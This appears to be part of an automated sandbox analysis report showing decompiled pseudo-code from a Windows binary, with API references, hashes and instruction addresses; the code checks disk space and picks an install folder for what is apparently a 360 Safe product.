                                                                                                                                                                                          Function 00C974EF Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?), ref: 00C9750E
                                                                                                                                                                                          • CoCreateInstance.OLE32(?,?,?,00D3A8C0), ref: 00C97526
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2151042543-0
                                                                                                                                                                                          • Opcode ID: 189f8dd0753289ff6681be04fd4fa23903976727eca70eb6090173cf19e547ae
                                                                                                                                                                                          • Instruction ID: 4e6a7894ea298bdd9a6a5085b576038bb68460e86586cbdc2877b081549ca75d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 189f8dd0753289ff6681be04fd4fa23903976727eca70eb6090173cf19e547ae
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AF01272601209BBCB00DFA9DD49EDFBBBCEB49750B01401AF505E3250DA74EA05CB72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CED568 Relevance: 46.0, APIs: 16, Strings: 10, Instructions: 461COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 ced568-ced5e5 call d0155a call c9d261 OutputDebugStringW call c9820f call ce7974 9 ced65c-ced688 call c9820f call d0071a 0->9 10 ced5e7-ced633 call c9d261 OutputDebugStringW call c9820f call d0aa40 call cec0cf 0->10 23 ced68b-ced69f call c9b6b2 call ced495 10->23 24 ced635-ced639 10->24 34 ced6ca-ced711 call c9d261 OutputDebugStringW call c9820f call caf60a call ced4d5 23->34 35 ced6a1-ced6b0 call c9b6b2 call ceccc4 23->35 24->23 25 ced63b 24->25 27 ced63d-ced644 25->27 28 ced646-ced65a call c9b6b2 call ced495 25->28 27->23 27->28 28->9 28->23 53 ced754-ced769 34->53 54 ced713-ced732 call c9d261 OutputDebugStringW 34->54 44 ced6b5-ced6b7 35->44 44->34 46 ced6b9-ced6bd 44->46 46->9 49 ced6bf 46->49 49->34 51 ced6c1-ced6c8 49->51 51->9 51->34 56 ced76f-ced80e call d006a0 SHGetSpecialFolderPathW PathAppendW call caf3cc call ce7974 call d0aa40 call c9accc 53->56 57 cedb05-cedb24 call c9ccc5 call cae704 call d0068e 53->57 62 ced734-ced74f call c9820f call cae704 call d0068e 54->62 82 ced819-ced820 56->82 83 ced810-ced814 call c9ccc5 56->83 57->9 62->9 85 ced8d9-ced8f0 call c9b6b2 call ced495 82->85 86 ced826 82->86 83->82 97 ced912-ced95c GetTickCount call c9d261 call c98323 call c9b6b2 call ced495 85->97 98 ced8f2-ced90c call c9b6b2 call ceccc4 85->98 87 ced828-ced82e 86->87 88 ced834-ced86b call c9d261 OutputDebugStringW call c9820f 86->88 87->85 87->88 99 cedac3-cedac9 88->99 100 ced871-ced878 88->100 128 ced97e-ced9f6 call d006a0 SHGetSpecialFolderPathW PathAppendW call caf3cc call c9accc call c98323 call c9b6b2 call ced495 97->128 129 ced95e-ced978 call c9b6b2 call ceccc4 97->129 98->57 98->97 99->56 103 cedacf 99->103 104 ced87a-ced87c 100->104 105 ced882-ced885 100->105 103->57 104->105 108 cedad1-cedaee call c9d261 104->108 105->99 110 ced88b-ced892 105->110 122 cedaf6-cedb02 call c9820f 108->122 114 ced89c-ced8d4 call c9d261 OutputDebugStringW call c9820f 110->114 115 ced894-ced896 110->115 114->99 115->99 115->114 122->57 147 ceda18-ceda67 call caf3cc call c9aa1c call c9ca59 call c98323 call c9b6b2 call ced495 128->147 148 ced9f8-ceda12 call c9b6b2 call ceccc4 128->148 129->122 129->128 165 ceda69-ceda83 call c9b6b2 call ceccc4 147->165 166 ceda85-ceda90 147->166 148->122 148->147 165->122 165->166 168 cedab4-cedac0 call c9820f 166->168 169 ceda92-ceda95 166->169 168->99 172 ceda9b-ceda9f 169->172 173 ceda97-ceda99 169->173 176 cedaa2-cedaa5 172->176 173->172 173->176 176->168 178 cedaa7-cedaaa 176->178 178->168 179 cedaac-cedaae 178->179 179->62 179->168
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00CED568(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				WCHAR* _t167;
				WCHAR* _t171;
				void* _t173;
				WCHAR* _t177;
				void* _t182;
				signed int _t184;
				WCHAR* _t185;
				signed int _t191;
				signed int _t215;
				WCHAR* _t216;
				signed int _t223;
				signed int _t237;
				signed int _t246;
				void* _t255;
				void* _t259;
				void* _t262;
				void* _t265;
				WCHAR* _t266;
				void* _t270;
				WCHAR* _t271;
				WCHAR* _t276;
				WCHAR* _t281;
				void* _t285;
				void* _t287;
				void* _t290;
				void* _t305;
				void* _t307;
				signed int _t322;
				void* _t324;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t336;
				void* _t338;
				signed int _t364;
				signed int _t367;
				void* _t368;
				void* _t374;
				WCHAR* _t375;
				void* _t377;
				signed int _t378;
				WCHAR* _t380;
				short* _t381;
				signed int _t386;

				_t364 = __edx;
				_t378 = _t377 - 0x410;
				_t375 = _t378 - 4;
				_t163 =  *0xd64070; // 0x8a9e1774
				_t375[0x208] = _t163 ^ _t375;
				E00D0155A(0xd37cd9, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t375 - 0x24)) = __ecx;
				_t373 = _t375[0x20e];
				_t167 =  *0xd5d01c; // 0xd5d014
				 *(_t375 - 0x38) = _t373;
				 *(_t375 - 0x10) = _t167;
				 *(_t375 - 4) =  *(_t375 - 4) & 0x00000000;
				E00C9D261(_t375 - 0x10, L"Begin Check", 0x44);
				_t289 = OutputDebugStringW;
				OutputDebugStringW( *(_t375 - 0x10)); // executed
				E00C9820F(_t375 - 0x10);
				_t171 =  *0xd5d01c; // 0xd5d014
				 *(_t375 - 0x14) = _t171;
				_push(_t375 - 0x20);
				_t367 = 1;
				_push( *_t373);
				 *(_t375 - 4) = 1;
				_t173 = E00CE7974(_t364);
				_t384 = _t173;
				if(_t173 == 0) {
					L6:
					E00C9820F(_t375 - 0x14);
					 *[fs:0x0] =  *((intOrPtr*)(_t375 - 0xc));
					_pop(_t368);
					_pop(_t374);
					_pop(_t290);
					return E00D0071A(_t367, _t290, _t375[0x208] ^ _t375, _t364, _t368, _t374);
				}
				_t177 =  *0xd5d01c; // 0xd5d014
				 *(_t375 - 0x10) = _t177;
				_push(L"Get Disk Space");
				_push(_t375 - 0x10);
				 *(_t375 - 4) = 2;
				E00C9D261();
				OutputDebugStringW( *(_t375 - 0x10)); // executed
				_t305 = _t375 - 0x10;
				 *(_t375 - 4) = 1;
				E00C9820F(_t305);
				 *((intOrPtr*)(_t375 - 0x20)) = E00D0AA40( *((intOrPtr*)(_t375 - 0x20)),  *(_t375 - 0x1c), 0x100000, 0);
				 *(_t375 - 0x1c) = _t364;
				_t182 = E00CEC0CF(OutputDebugStringW, _t384); // executed
				if(_t182 == 0) {
					L7:
					 *(_t375 - 0x2c) = _t378;
					E00C9B6B2(_t378, _t373);
					_t184 = E00CED495(_t289, _t378, _t364, _t367, _t373, __eflags);
					_t307 = _t305;
					__eflags = _t184;
					if(_t184 == 0) {
						L12:
						_t185 =  *0xd5d01c; // 0xd5d014
						 *(_t375 - 0x10) = _t185;
						_push(L"Change");
						_push(_t375 - 0x10);
						 *(_t375 - 4) = 3;
						E00C9D261();
						OutputDebugStringW( *(_t375 - 0x10));
						 *(_t375 - 4) = 1;
						E00C9820F(_t375 - 0x10);
						E00CAF60A(_t289, _t375 - 0x50, _t367, _t373, __eflags);
						 *(_t375 - 4) = 4;
						_t191 = E00CED4D5(_t289, _t364, __eflags, _t375 - 0x50);
						__eflags = _t191;
						if(_t191 != 0) {
							 *(_t375 - 0x18) =  *(_t375 - 0x18) & 0x00000000;
							_t367 =  *((intOrPtr*)(_t375 - 0x40)) -  *((intOrPtr*)(_t375 - 0x44)) >> 1;
							 *((intOrPtr*)(_t375 - 0x34)) = 0x1400;
							__eflags = _t367;
							if(_t367 <= 0) {
								L49:
								E00C9CCC5(_t373, _t375, _t375 - 0x14);
								E00CAE704(_t375 - 0x50);
								E00D0068E(_t289, _t364, _t367, _t373, __eflags,  *((intOrPtr*)(_t375 - 0x50)));
								_t367 = 1;
								goto L6;
							} else {
								goto L17;
							}
							do {
								L17:
								_t375[0x104] = 0;
								E00D006A0(_t367,  &(_t375[0x105]), 0, 0x206);
								_t380 = _t378 + 0xc;
								__imp__SHGetSpecialFolderPathW(0,  &(_t375[0x104]), 0x26, 1);
								PathAppendW( &(_t375[0x104]), L"360\\360Safe");
								_t375[0x104] =  *(E00CAF3CC(_t289, _t375 - 0x50, _t367, _t373,  *(_t375 - 0x18)));
								_push(_t375 - 0x20);
								_push( &(_t375[0x104]));
								E00CE7974(_t364);
								 *((intOrPtr*)(_t375 - 0x20)) = E00D0AA40( *((intOrPtr*)(_t375 - 0x20)),  *(_t375 - 0x1c), 0x100000, 0);
								 *(_t375 - 0x1c) = _t364;
								E00C9ACCC(_t375 - 0x14,  &(_t375[0x104]));
								__eflags = ( *( *_t373) & 0x0000ffff) - ( *( *(_t375 - 0x14)) & 0x0000ffff);
								if(( *( *_t373) & 0x0000ffff) == ( *( *(_t375 - 0x14)) & 0x0000ffff)) {
									E00C9CCC5(_t375 - 0x14, _t375, _t373);
								}
								_t322 =  *(_t375 - 0x1c);
								__eflags = _t322;
								if(__eflags > 0) {
									L29:
									 *(_t375 - 0x10) = _t380;
									E00C9B6B2(_t380, _t375 - 0x14);
									_t215 = E00CED495(_t289, _t380, _t364, _t367, _t373, __eflags);
									_t324 = _t322;
									__eflags = _t215;
									if(_t215 == 0) {
										L31:
										_t216 =  *0xd5d01c; // 0xd5d014
										 *(_t375 - 0x10) = _t216;
										 *(_t375 - 4) = 9;
										E00C9D261(_t375 - 0x10, 0xd3e510, GetTickCount());
										_t373 =  *(_t375 - 0x10);
										_t381 =  &(_t380[6]);
										_t325 = _t375 - 0x14;
										E00C98323(_t325,  *((intOrPtr*)( *(_t375 - 0x10) - 8)),  *(_t375 - 0x10));
										 *(_t375 - 0x28) = _t381;
										E00C9B6B2(_t381, _t375 - 0x14);
										_t223 = E00CED495(_t289, _t381, _t364, _t367, _t373, __eflags);
										_t327 = _t325;
										__eflags = _t223;
										if(_t223 == 0) {
											L33:
											 *_t375 = 0;
											E00D006A0(_t367,  &(_t375[1]), 0, 0x206);
											_t378 =  &(_t381[6]);
											__imp__SHGetSpecialFolderPathW(0, _t375, 0x26, 1);
											PathAppendW(_t375, L"360Safe");
											 *_t375 =  *(E00CAF3CC(_t289, _t375 - 0x50, _t367, _t373,  *(_t375 - 0x18)));
											E00C9ACCC(_t375 - 0x14, _t375);
											_t330 = _t375 - 0x14;
											E00C98323(_t330,  *((intOrPtr*)(_t373 - 8)), _t373);
											 *(_t375 - 0x28) = _t378;
											E00C9B6B2(_t378, _t375 - 0x14);
											_t237 = E00CED495(_t289, _t378, _t364, _t367, _t373, __eflags);
											_t332 = _t330;
											__eflags = _t237;
											if(_t237 == 0) {
												L35:
												 *(_t375 - 0x2c) =  *(E00CAF3CC(_t289, _t375 - 0x50, _t367, _t373,  *(_t375 - 0x18))) & 0x0000ffff;
												E00C9AA1C(_t375 - 0x14, _t364, _t375, 1, _t375 - 0x2c);
												E00C9CA59(_t375 - 0x14, L":\\360Safe");
												_t336 = _t375 - 0x14;
												E00C98323(_t336,  *((intOrPtr*)(_t373 - 8)), _t373);
												 *(_t375 - 0x28) = _t378;
												E00C9B6B2(_t378, _t375 - 0x14);
												_t246 = E00CED495(_t289, _t378, _t364, _t367, _t373, __eflags);
												_t338 = _t336;
												__eflags = _t246;
												if(_t246 == 0) {
													L37:
													_t364 = _t367 - 1;
													__eflags =  *(_t375 - 0x18) - _t364;
													if( *(_t375 - 0x18) != _t364) {
														L44:
														 *(_t375 - 4) = 4;
														E00C9820F(_t375 - 0x10);
														_t373 =  *(_t375 - 0x38);
														goto L45;
													}
													__eflags =  *((intOrPtr*)(_t375 - 0x34)) - 0x190;
													if( *((intOrPtr*)(_t375 - 0x34)) != 0x190) {
														L40:
														_t142 = _t375 - 0x18;
														 *_t142 =  *(_t375 - 0x18) | 0xffffffff;
														__eflags =  *_t142;
														 *((intOrPtr*)(_t375 - 0x34)) = 0x190;
														L41:
														__eflags =  *(_t375 - 0x18) - _t364;
														if( *(_t375 - 0x18) != _t364) {
															goto L44;
														}
														__eflags =  *((intOrPtr*)(_t375 - 0x34)) - 0x190;
														if( *((intOrPtr*)(_t375 - 0x34)) != 0x190) {
															goto L44;
														}
														__eflags = 0;
														if(0 == 0) {
															L15:
															E00C9820F(_t375 - 0x10);
															E00CAE704(_t375 - 0x50);
															E00D0068E(_t289, _t364, _t367, _t373, __eflags,  *((intOrPtr*)(_t375 - 0x50)));
															_t367 = 0;
															goto L6;
														}
														goto L44;
													}
													__eflags = 0;
													if(0 == 0) {
														goto L41;
													}
													goto L40;
												}
												_push(_t338);
												 *(_t375 - 0x28) = _t378;
												E00C9B6B2(_t378, _t375 - 0x14);
												_t255 = E00CECCC4(_t289,  *((intOrPtr*)(_t375 - 0x24)), _t364, _t367, _t373, __eflags);
												__eflags = _t255 - 1;
												if(_t255 == 1) {
													L48:
													 *(_t375 - 4) = 4;
													E00C9820F(_t375 - 0x10);
													_t373 =  *(_t375 - 0x38);
													goto L49;
												}
												goto L37;
											}
											_push(_t332);
											 *(_t375 - 0x28) = _t378;
											E00C9B6B2(_t378, _t375 - 0x14);
											_t259 = E00CECCC4(_t289,  *((intOrPtr*)(_t375 - 0x24)), _t364, _t367, _t373, __eflags);
											__eflags = _t259 - 1;
											if(_t259 == 1) {
												goto L48;
											}
											goto L35;
										}
										_push(_t327);
										 *(_t375 - 0x28) = _t381;
										E00C9B6B2(_t381, _t375 - 0x14);
										_t262 = E00CECCC4(_t289,  *((intOrPtr*)(_t375 - 0x24)), _t364, _t367, _t373, __eflags);
										__eflags = _t262 - 1;
										if(_t262 == 1) {
											goto L48;
										}
										goto L33;
									}
									_push(_t324);
									 *(_t375 - 0x10) = _t380;
									E00C9B6B2(_t380, _t375 - 0x14);
									_t265 = E00CECCC4(_t289,  *((intOrPtr*)(_t375 - 0x24)), _t364, _t367, _t373, __eflags);
									__eflags = _t265 - 1;
									if(_t265 == 1) {
										goto L49;
									}
									goto L31;
								}
								if(__eflags < 0) {
									L22:
									_t266 =  *0xd5d01c; // 0xd5d014
									 *(_t375 - 0x10) = _t266;
									 *(_t375 - 4) = 6;
									E00C9D261(_t375 - 0x10, L"Index : %d",  *(_t375 - 0x18));
									_t378 =  &(_t380[6]);
									OutputDebugStringW( *(_t375 - 0x10));
									 *(_t375 - 4) = 4;
									E00C9820F(_t375 - 0x10);
									_t270 = _t367 - 1;
									__eflags =  *(_t375 - 0x18) - _t270;
									if( *(_t375 - 0x18) != _t270) {
										goto L45;
									}
									__eflags =  *((intOrPtr*)(_t375 - 0x34)) - 0x190;
									if( *((intOrPtr*)(_t375 - 0x34)) != 0x190) {
										L25:
										__eflags =  *(_t375 - 0x18) - _t270;
										if( *(_t375 - 0x18) != _t270) {
											goto L45;
										}
										__eflags =  *((intOrPtr*)(_t375 - 0x34)) - 0x190;
										if( *((intOrPtr*)(_t375 - 0x34)) != 0x190) {
											L28:
											_t271 =  *0xd5d01c; // 0xd5d014
											 *(_t375 - 0x10) = _t271;
											_push(L"400");
											_push(_t375 - 0x10);
											 *(_t375 - 4) = 8;
											E00C9D261();
											OutputDebugStringW( *(_t375 - 0x10));
											 *(_t375 - 4) = 4;
											E00C9820F(_t375 - 0x10);
											 *(_t375 - 0x18) =  *(_t375 - 0x18) | 0xffffffff;
											 *((intOrPtr*)(_t375 - 0x34)) = 0x190;
											goto L45;
										}
										__eflags = 0;
										if(0 == 0) {
											goto L45;
										}
										goto L28;
									}
									__eflags = 0;
									if(0 == 0) {
										_t276 =  *0xd5d01c; // 0xd5d014
										 *(_t375 - 0x10) = _t276;
										 *(_t375 - 4) = 7;
										E00C9D261(_t375 - 0x10, L"return",  *(_t375 - 0x18));
										L14:
										OutputDebugStringW( *(_t375 - 0x10));
										goto L15;
									}
									goto L25;
								}
								__eflags =  *((intOrPtr*)(_t375 - 0x20)) -  *((intOrPtr*)(_t375 - 0x34));
								if( *((intOrPtr*)(_t375 - 0x20)) >  *((intOrPtr*)(_t375 - 0x34))) {
									goto L29;
								}
								goto L22;
								L45:
								 *(_t375 - 0x18) =  *(_t375 - 0x18) + 1;
								__eflags =  *(_t375 - 0x18) - _t367;
							} while ( *(_t375 - 0x18) < _t367);
							goto L49;
						}
						_t281 =  *0xd5d01c; // 0xd5d014
						 *(_t375 - 0x10) = _t281;
						_push(L"GetVolumes Failed");
						_push(_t375 - 0x10);
						 *(_t375 - 4) = 5;
						E00C9D261();
						goto L14;
					}
					_push(_t307);
					 *(_t375 - 0x2c) = _t378;
					E00C9B6B2(_t378, _t373);
					_t285 = E00CECCC4(_t289,  *((intOrPtr*)(_t375 - 0x24)), _t364, _t367, _t373, __eflags); // executed
					__eflags = _t285 - _t367;
					if(_t285 != _t367) {
						goto L12;
					}
					__eflags =  *(_t375 - 0x1c);
					if(__eflags > 0) {
						goto L6;
					}
					if(__eflags < 0) {
						goto L12;
					}
					__eflags =  *((intOrPtr*)(_t375 - 0x20)) - 0x1400;
					if( *((intOrPtr*)(_t375 - 0x20)) > 0x1400) {
						goto L6;
					}
					goto L12;
				}
				_t386 =  *(_t375 - 0x1c);
				if(_t386 < 0) {
					goto L7;
				}
				if(_t386 > 0) {
					L5:
					 *(_t375 - 0x2c) = _t378;
					E00C9B6B2(_t378, _t373);
					_t287 = E00CED495(_t289, _t378, _t364, _t367, _t373, _t387);
					_t305 = _t305;
					if(_t287 != _t367) {
						goto L7;
					}
					goto L6;
				}
				_t387 =  *((intOrPtr*)(_t375 - 0x20)) - 0x190;
				if( *((intOrPtr*)(_t375 - 0x20)) < 0x190) {
					goto L7;
				}
				goto L5;
			}


















































                                                                                                                                                                                          0x00ced568
                                                                                                                                                                                          0x00ced569
                                                                                                                                                                                          0x00ced56f
                                                                                                                                                                                          0x00ced573
                                                                                                                                                                                          0x00ced57a
                                                                                                                                                                                          0x00ced587
                                                                                                                                                                                          0x00ced58c
                                                                                                                                                                                          0x00ced58f
                                                                                                                                                                                          0x00ced595
                                                                                                                                                                                          0x00ced59a
                                                                                                                                                                                          0x00ced59d
                                                                                                                                                                                          0x00ced5a0
                                                                                                                                                                                          0x00ced5ad
                                                                                                                                                                                          0x00ced5b2
                                                                                                                                                                                          0x00ced5bd
                                                                                                                                                                                          0x00ced5c2
                                                                                                                                                                                          0x00ced5c7
                                                                                                                                                                                          0x00ced5cc
                                                                                                                                                                                          0x00ced5d6
                                                                                                                                                                                          0x00ced5d7
                                                                                                                                                                                          0x00ced5d8
                                                                                                                                                                                          0x00ced5d9
                                                                                                                                                                                          0x00ced5dc
                                                                                                                                                                                          0x00ced5e3
                                                                                                                                                                                          0x00ced5e5
                                                                                                                                                                                          0x00ced65c
                                                                                                                                                                                          0x00ced65f
                                                                                                                                                                                          0x00ced669
                                                                                                                                                                                          0x00ced671
                                                                                                                                                                                          0x00ced672
                                                                                                                                                                                          0x00ced673
                                                                                                                                                                                          0x00ced688
                                                                                                                                                                                          0x00ced688
                                                                                                                                                                                          0x00ced5e7
                                                                                                                                                                                          0x00ced5ec
                                                                                                                                                                                          0x00ced5f2
                                                                                                                                                                                          0x00ced5f7
                                                                                                                                                                                          0x00ced5f8
                                                                                                                                                                                          0x00ced5fc
                                                                                                                                                                                          0x00ced606
                                                                                                                                                                                          0x00ced608
                                                                                                                                                                                          0x00ced60b
                                                                                                                                                                                          0x00ced60f
                                                                                                                                                                                          0x00ced626
                                                                                                                                                                                          0x00ced629
                                                                                                                                                                                          0x00ced62c
                                                                                                                                                                                          0x00ced633
                                                                                                                                                                                          0x00ced68b
                                                                                                                                                                                          0x00ced68e
                                                                                                                                                                                          0x00ced692
                                                                                                                                                                                          0x00ced697
                                                                                                                                                                                          0x00ced69c
                                                                                                                                                                                          0x00ced69d
                                                                                                                                                                                          0x00ced69f
                                                                                                                                                                                          0x00ced6ca
                                                                                                                                                                                          0x00ced6ca
                                                                                                                                                                                          0x00ced6cf
                                                                                                                                                                                          0x00ced6d5
                                                                                                                                                                                          0x00ced6da
                                                                                                                                                                                          0x00ced6db
                                                                                                                                                                                          0x00ced6df
                                                                                                                                                                                          0x00ced6e9
                                                                                                                                                                                          0x00ced6ee
                                                                                                                                                                                          0x00ced6f2
                                                                                                                                                                                          0x00ced6fa
                                                                                                                                                                                          0x00ced706
                                                                                                                                                                                          0x00ced70a
                                                                                                                                                                                          0x00ced70f
                                                                                                                                                                                          0x00ced711
                                                                                                                                                                                          0x00ced75a
                                                                                                                                                                                          0x00ced75e
                                                                                                                                                                                          0x00ced760
                                                                                                                                                                                          0x00ced767
                                                                                                                                                                                          0x00ced769
                                                                                                                                                                                          0x00cedb05
                                                                                                                                                                                          0x00cedb0b
                                                                                                                                                                                          0x00cedb13
                                                                                                                                                                                          0x00cedb1b
                                                                                                                                                                                          0x00cedb23
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced76f
                                                                                                                                                                                          0x00ced76f
                                                                                                                                                                                          0x00ced777
                                                                                                                                                                                          0x00ced785
                                                                                                                                                                                          0x00ced78a
                                                                                                                                                                                          0x00ced79a
                                                                                                                                                                                          0x00ced7ac
                                                                                                                                                                                          0x00ced7c0
                                                                                                                                                                                          0x00ced7ca
                                                                                                                                                                                          0x00ced7d1
                                                                                                                                                                                          0x00ced7d2
                                                                                                                                                                                          0x00ced7eb
                                                                                                                                                                                          0x00ced7f8
                                                                                                                                                                                          0x00ced7fb
                                                                                                                                                                                          0x00ced80b
                                                                                                                                                                                          0x00ced80e
                                                                                                                                                                                          0x00ced814
                                                                                                                                                                                          0x00ced814
                                                                                                                                                                                          0x00ced819
                                                                                                                                                                                          0x00ced81e
                                                                                                                                                                                          0x00ced820
                                                                                                                                                                                          0x00ced8d9
                                                                                                                                                                                          0x00ced8df
                                                                                                                                                                                          0x00ced8e3
                                                                                                                                                                                          0x00ced8e8
                                                                                                                                                                                          0x00ced8ed
                                                                                                                                                                                          0x00ced8ee
                                                                                                                                                                                          0x00ced8f0
                                                                                                                                                                                          0x00ced912
                                                                                                                                                                                          0x00ced912
                                                                                                                                                                                          0x00ced917
                                                                                                                                                                                          0x00ced91a
                                                                                                                                                                                          0x00ced92e
                                                                                                                                                                                          0x00ced933
                                                                                                                                                                                          0x00ced936
                                                                                                                                                                                          0x00ced93d
                                                                                                                                                                                          0x00ced940
                                                                                                                                                                                          0x00ced94b
                                                                                                                                                                                          0x00ced94f
                                                                                                                                                                                          0x00ced954
                                                                                                                                                                                          0x00ced959
                                                                                                                                                                                          0x00ced95a
                                                                                                                                                                                          0x00ced95c
                                                                                                                                                                                          0x00ced97e
                                                                                                                                                                                          0x00ced986
                                                                                                                                                                                          0x00ced98e
                                                                                                                                                                                          0x00ced993
                                                                                                                                                                                          0x00ced9a0
                                                                                                                                                                                          0x00ced9af
                                                                                                                                                                                          0x00ced9c3
                                                                                                                                                                                          0x00ced9ce
                                                                                                                                                                                          0x00ced9d7
                                                                                                                                                                                          0x00ced9da
                                                                                                                                                                                          0x00ced9e5
                                                                                                                                                                                          0x00ced9e9
                                                                                                                                                                                          0x00ced9ee
                                                                                                                                                                                          0x00ced9f3
                                                                                                                                                                                          0x00ced9f4
                                                                                                                                                                                          0x00ced9f6
                                                                                                                                                                                          0x00ceda18
                                                                                                                                                                                          0x00ceda26
                                                                                                                                                                                          0x00ceda32
                                                                                                                                                                                          0x00ceda3f
                                                                                                                                                                                          0x00ceda48
                                                                                                                                                                                          0x00ceda4b
                                                                                                                                                                                          0x00ceda56
                                                                                                                                                                                          0x00ceda5a
                                                                                                                                                                                          0x00ceda5f
                                                                                                                                                                                          0x00ceda64
                                                                                                                                                                                          0x00ceda65
                                                                                                                                                                                          0x00ceda67
                                                                                                                                                                                          0x00ceda85
                                                                                                                                                                                          0x00ceda85
                                                                                                                                                                                          0x00ceda8d
                                                                                                                                                                                          0x00ceda90
                                                                                                                                                                                          0x00cedab4
                                                                                                                                                                                          0x00cedab7
                                                                                                                                                                                          0x00cedabb
                                                                                                                                                                                          0x00cedac0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cedac0
                                                                                                                                                                                          0x00ceda92
                                                                                                                                                                                          0x00ceda95
                                                                                                                                                                                          0x00ceda9b
                                                                                                                                                                                          0x00ceda9b
                                                                                                                                                                                          0x00ceda9b
                                                                                                                                                                                          0x00ceda9b
                                                                                                                                                                                          0x00ceda9f
                                                                                                                                                                                          0x00cedaa2
                                                                                                                                                                                          0x00cedaa2
                                                                                                                                                                                          0x00cedaa5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cedaa7
                                                                                                                                                                                          0x00cedaaa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cedaac
                                                                                                                                                                                          0x00cedaae
                                                                                                                                                                                          0x00ced734
                                                                                                                                                                                          0x00ced737
                                                                                                                                                                                          0x00ced73f
                                                                                                                                                                                          0x00ced747
                                                                                                                                                                                          0x00ced74d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced74d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cedaae
                                                                                                                                                                                          0x00ceda97
                                                                                                                                                                                          0x00ceda99
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceda99
                                                                                                                                                                                          0x00ceda69
                                                                                                                                                                                          0x00ceda6f
                                                                                                                                                                                          0x00ceda73
                                                                                                                                                                                          0x00ceda7b
                                                                                                                                                                                          0x00ceda80
                                                                                                                                                                                          0x00ceda83
                                                                                                                                                                                          0x00cedaf6
                                                                                                                                                                                          0x00cedaf9
                                                                                                                                                                                          0x00cedafd
                                                                                                                                                                                          0x00cedb02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cedb02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceda83
                                                                                                                                                                                          0x00ced9f8
                                                                                                                                                                                          0x00ced9fe
                                                                                                                                                                                          0x00ceda02
                                                                                                                                                                                          0x00ceda0a
                                                                                                                                                                                          0x00ceda0f
                                                                                                                                                                                          0x00ceda12
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceda12
                                                                                                                                                                                          0x00ced95e
                                                                                                                                                                                          0x00ced964
                                                                                                                                                                                          0x00ced968
                                                                                                                                                                                          0x00ced970
                                                                                                                                                                                          0x00ced975
                                                                                                                                                                                          0x00ced978
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced978
                                                                                                                                                                                          0x00ced8f2
                                                                                                                                                                                          0x00ced8f8
                                                                                                                                                                                          0x00ced8fc
                                                                                                                                                                                          0x00ced904
                                                                                                                                                                                          0x00ced909
                                                                                                                                                                                          0x00ced90c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ced90c
                                                                                                                                                                                          0x00ced826
                                                                                                                                                                                          0x00ced834
                                                                                                                                                                                          0x00ced834
                                                                                                                                                                                          0x00ced839
                                                                                                                                                                                          0x00ced848
                                                                                                                                                                                          0x00ced84c
                                                                                                                                                                                          0x00ced851
                                                                                                                                                                                          0x00ced857
                                                                                                                                                                                          0x00ced85c
                                                                                                                                                                                          0x00ced860
                                                                                                                                                                                          0x00ced865
                                                                                                                                                                                          0x00ced868
